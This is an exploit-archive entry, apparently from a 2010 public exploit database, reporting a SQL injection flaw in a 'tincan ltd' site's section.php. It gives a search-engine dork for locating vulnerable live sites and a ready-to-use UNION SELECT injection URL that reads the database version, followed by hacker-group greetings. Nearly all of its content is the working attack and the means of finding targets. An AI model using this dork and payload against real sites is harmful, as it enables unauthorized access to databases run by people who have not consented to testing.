[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : tincan ltd (section) SQL Injection Vulnerability
# Published : 2010-01-11
# Author : altbta
# Previous Title : FAQEngine 4.24.00 - Remote File Inclusion vulnerability
# Next Title : Alwjeez Script Database Backup Exploit
+/=============================================+
# [+] Title : tincan ltd (section) SQL Injection Vulnerability
# [+] site s.p : www.tincan.co.uk<http://www.tincan.co.uk>
# [+] Author : altbta
# [+] Email : l_9@HoTMaIL.com
# [+] home : v4-team.com<http://v4-team.com> & tryag.cc
+=============================================/+
===============================================
DorK : intext:'powered by tincan ltd' and inurl:"section.php?section=9"
===============================================
Exploit :
http://server/section.php?section=9&topic=6+union+select+1,2,3,version(),5--
============================================
GreeTz To :
RxH & ab0-3th4b & sniper site